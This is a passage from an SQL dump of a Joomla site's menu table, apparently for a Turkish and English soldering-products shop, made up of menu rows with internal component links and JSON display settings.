00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":1,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',179,180,0,'*',0),(638,'topmenu-tr','Video','video','','video','index.php?option=com_content&view=category&id=86','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_category_heading_title_text\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"list_show_votes\":\"\",\"list_show_ratings\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',5,8,0,'*',0),(464,'top','Home','home','','home','index.php?Itemid=','alias',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',115,'{\"aliasoptions\":\"435\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',263,264,0,'*',0),(466,'aboutjoomla','Smart Search','smart-search','','using-joomla/extensions/components/search-component/smart-search','index.php?option=com_finder&view=search&q=&f=','component',1,276,5,27,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_date_filters\":\"\",\"show_advanced\":\"\",\"expand_advanced\":\"\",\"show_description\":\"\",\"description_length\":255,\"show_url\":\"\",\"show_pagination_limit\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"allow_empty_query\":\"0\",\"search_order\":\"\",\"show_feed\":\"0\",\"show_feed_text\":\"0\",\"show_feed_link\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',153,154,0,'*',0),(467,'aboutjoomla','Smart Search','smart-search','','using-joomla/extensions/modules/utility-modules/smart-search','index.php?option=com_content&view=article&id=70','component',1,414,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',215,216,0,'*',0),(592,'main','COM_JDICTION','com_jdiction','','com_jdiction','index.php?option=com_jdiction','component',1,1,1,10127,0,'0000-00-00 00:00:00',0,1,'components/com_jdiction/assets/icon-16-translate.png',0,'{}',311,312,0,'',1),(591,'topmenu-tr','Ürünler','ürünler','','ürünler','index.php?option=com_virtuemart&view=category&virtuemart_category_id=0&virtuemart_manufacturer_id=0','component',1,1,1,10000,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_store_desc\":\"\",\"categorylayout\":\"\",\"showcategory_desc\":\"\",\"showcategory\":\"\",\"categories_per_row\":\"\",\"showproducts\":\"\",\"showsearch\":\"\",\"productsublayout\":\"\",\"products_per_row\":\"\",\"featured\":\"\",\"featured_rows\":\"\",\"discontinued\":\"\",\"discontinued_rows\":\"\",\"latest\":\"\",\"latest_rows\":\"\",\"topten\":\"\",\"topten_rows\":\"\",\"recent\":\"\",\"recent_rows\":\"\",\"stf_itemid\":\"\",\"stf_categorylayout\":\"\",\"stf_show_store_desc\":\"\",\"stf_showcategory_desc\":\"\",\"stf_showcategory\":\"\",\"stf_categories_per_row\":\"\",\"stf_showproducts\":\"\",\"stf_showsearch\":\"\",\"stf_productsublayout\":\"\",\"stf_products_per_row\":\"\",\"stf_featured\":\"\",\"stf_featured_rows\":\"\",\"stf_discontinued\":\"\",\"stf_discontinued_rows\":\"\",\"stf_latest\":\"\",\"stf_latest_rows\":\"\",\"stf_topten\":\"\",\"stf_topten_rows\":\"\",\"stf_recent\":\"\",\"stf_recent_rows\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',3,4,0,'tr-TR',0),(589,'topmenu-en','Contacts','contacts','','contacts','index.php?option=com_contact&view=contact&id=9','component',1,1,1,8,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_tags\":\"\",\"show_info\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"add_mailto_link\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_misc\":\"\",\"show_articles\":\"\",\"articles_display_num\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',27,28,0,'en-GB',0),(557,'main','com_tags','com-tags','','com-tags','index.php?option=com_tags','component',1,1,1,10074,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'{}',307,308,0,'',1),(482,'mainmenu-degil','Main Menu for All Languages','main-menu-for-english-language','','main-menu-for-english-language','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',115,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"page_subheading\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',289,290,0,'*',0),(595,'topmenu-tr','Hakkımızda','hakkımızda','','hakkımızda','index.php?option=com_content&view=article&id=72','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',9,10,0,'tr-TR',0),(594,'mainmenu-tr','Ana Sayfa','anasayfa2-menu','','anasayfa2-menu','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"rdate\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"page_subheading\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',315,316,1,'tr-TR',0),(590,'topmenu-tr','Ana Sayfa','ana-sayfa','','ana-sayfa','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"page_subheading\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',1,2,0,'tr-TR',0),(588,'topmenu-en','Products','products-en','','products-en','index.php?option=com_virtuemart&view=category&virtuemart_category_id=0&virtuemart_manufacturer_id=0','component',1,1,1,10000,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_store_desc\":\"\",\"categorylayout\":\"\",\"showcategory_desc\":\"\",\"showcategory\":\"\",\"categories_per_row\":\"\",\"showproducts\":\"\",\"showsearch\":\"\",\"productsublayout\":\"\",\"products_per_row\":\"\",\"featured\":\"\",\"featured_rows\":\"\",\"discontinued\":\"\",\"discontinued_rows\":\"\",\"latest\":\"\",\"latest_rows\":\"\",\"topten\":\"\",\"topten_rows\":\"\",\"recent\":\"\",\"recent_rows\":\"\",\"stf_itemid\":\"\",\"stf_categorylayout\":\"\",\"stf_show_store_desc\":\"\",\"stf_showcategory_desc\":\"\",\"stf_showcategory\":\"\",\"stf_categories_per_row\":\"\",\"stf_showproducts\":\"\",\"stf_showsearch\":\"\",\"stf_productsublayout\":\"\",\"stf_products_per_row\":\"\",\"stf_featured\":\"\",\"stf_featured_rows\":\"\",\"stf_discontinued\":\"\",\"stf_discontinued_rows\":\"\",\"stf_latest\":\"\",\"stf_latest_rows\":\"\",\"stf_topten\":\"\",\"stf_topten_rows\":\"\",\"stf_recent\":\"\",\"stf_recent_rows\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',21,22,0,'en-GB',0),(556,'main','COM_ASSOCIATIONS','com-associations','','com-associations','index.php?option=com_associations','component',1,1,1,10070,0,'0000-00-00 00:00:00',0,1,'class:associations',0,'{}',305,306,0,'',1),(586,'main','TCPDF','tcpdf','','tcpdf','index.php?option=com_tcpdf','component',1,1,1,10122,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',309,310,0,'',1),(736,'main','COM_VIRTUEMART_MENU_CONFIGURATION','com_virtuemart_menu_configuration','','com_virtuemart/com_virtuemart_menu_configuration','index.php?option=com_virtuemart&view=config','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-config.png',0,'{}',384,385,0,'',1),(735,'main','COM_VIRTUEMART_MENU_PAYMENTMETHODS','com_virtuemart_menu_paymentmethods','','com_virtuemart/com_virtuemart_menu_paymentmethods','index.php?option=com_virtuemart&view=paymentmethod','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-paymentmethods.png',0,'{}',382,383,0,'',1),(734,'main','COM_VIRTUEMART_MENU_SHIPMENTMETHODS','com_virtuemart_menu_shipmentmethods','','com_virtuemart/com_virtuemart_menu_shipmentmethods','index.php?option=com_virtuemart&view=shipmentmethod','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-shipmentmethods.png',0,'{}',380,381,0,'',1),(733,'main','COM_VIRTUEMART_MENU_MEDIAFILES','com_virtuemart_menu_mediafiles','','com_virtuemart/com_virtuemart_menu_mediafiles','index.php?option=com_virtuemart&view=media','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-media.png',0,'{}',378,379,0,'',1),(732,'main','COM_VIRTUEMART_MENU_STORE','com_virtuemart_menu_store','','com_virtuemart/com_virtuemart_menu_store','index.php?option=com_virtuemart&view=user&task=editshop','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-shop.png',0,'{}',376,377,0,'',1),(731,'main','COM_VIRTUEMART_MENU_MANUFACTURERS','com_virtuemart_menu_manufacturers','','com_virtuemart/com_virtuemart_menu_manufacturers','index.php?option=com_virtuemart&view=manufacturer','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-manufacturers.png',0,'{}',374,375,0,'',1),(587,'topmenu-en','Home Page','home-en','','home-en','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"1\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',11,12,0,'en-GB',0),(493,'topmenu-tr','İletişim','iletisim','','iletisim','index.php?option=com_contact&view=contact&id=10','component',1,1,1,8,0,'0000-00-00 00:00:00',0,1,' ',115,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_tags\":\"\",\"show_info\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"add_mailto_link\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_misc\":\"\",\"show_articles\":\"\",\"articles_display_num\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',13,14,0,'tr-TR',0),(502,'solmenu-teknik','Lehimleme Hakkında','lehimleme-hakk-nda','','lehimleme-hakk-nda','index.php?option=com_content&view=featured','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"alpha\",\"order_date\":\"created\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',291,292,0,'tr-TR',0),(708,'main','COM_DJIMAGESLIDER','com_djimageslider','','com_djimageslider','index.php?option=com_djimageslider','component',1,1,1,10039,0,'0000-00-00 00:00:00',0,1,'components/com_djimageslider/assets/icon-16-djimageslider.png',0,'{}',347,348,0,'',1),(730,'main','COM_VIRTUEMART_MENU_USERS','com_virtuemart_menu_users','','com_virtuemart/com_virtuemart_menu_users','index.php?option=com_virtuemart&view=user','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-shoppers.png',0,'{}',372,373,0,'',1),(729,'main','COM_VIRTUEMART_MENU_REPORT','com_virtuemart_menu_report','','com_virtuemart/com_virtuemart_menu_report','index.php?option=com_virtuemart&view=report','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-report.png',0,'{}',370,371,0,'',1),(722,'main','COM_JCE_MENU_FILEBROWSER','com_jce_menu_filebrowser','','com_jce/com_jce_menu_filebrowser','index.php?option=com_jce&view=browser','component',1,718,2,10044,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',356,357,0,'',1),(737,'main','VirtueMart AIO','virtuemart-aio','','virtuemart-aio','index.php?option=com_virtuemart_allinone','component',1,1,1,10001,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',387,388,0,'',1),(503,'solmenu-teknik','Kurşunsuz Lehim','kursunsuz-lehim','','kursunsuz-lehim','index.php?option=com_content&view=article&id=76','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',31,32,0,'tr-TR',0),(504,'solmenu-teknik','Dalga Lehimleme','dalga-lehimleme','','dalga-lehimleme','index.php?option=com_content&view=article&id=75','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',41,42,0,'tr-TR',0),(728,'main','COM_VIRTUEMART_MENU_ORDERS','com_virtuemart_menu_orders','','com_virtuemart/com_virtuemart_menu_orders','index.php?option=com_virtuemart&view=orders','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-orders.png',0,'{}',368,369,0,'',1),(505,'solmenu-teknik','Kart Temizlemesi','kart-temizlemesi','','kart-temizlemesi','index.php?option=com_content&view=featured','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',293,294,0,'*',0),(506,'solmenu-teknik','Kart Üretim Teknolojileri','kart-ueretim-teknolojileri','','kart-ueretim-teknolojileri','index.php?option=com_content&view=article&id=74','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',43,44,0,'tr-TR',0),(507,'teknikbilgiler-en','Soldering','soldering','','soldering','index.php?option=com_content&view=featured','component',0,1,1,22,0,'0000-00-00 